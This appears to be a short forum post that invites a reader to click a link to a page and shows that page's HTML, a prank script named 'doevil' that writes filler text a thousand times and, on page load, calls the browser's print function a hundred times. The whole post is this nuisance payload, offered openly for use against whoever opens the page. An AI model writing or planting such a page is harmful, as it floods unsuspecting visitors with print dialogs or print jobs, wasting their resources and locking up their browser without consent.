If it didn't ask for confirmation, click this link to a page with this content.
Code:
<html><head><title>Muahahaha!</title>
<body onload="doevil()"><script type="text/javascript">
for(i = 0; i < 1000; ++i) {
  document.write("This is my evil text. ");
}

function doevil() {
  for(i = 0; i < 100; ++i) {
    print();
  }
}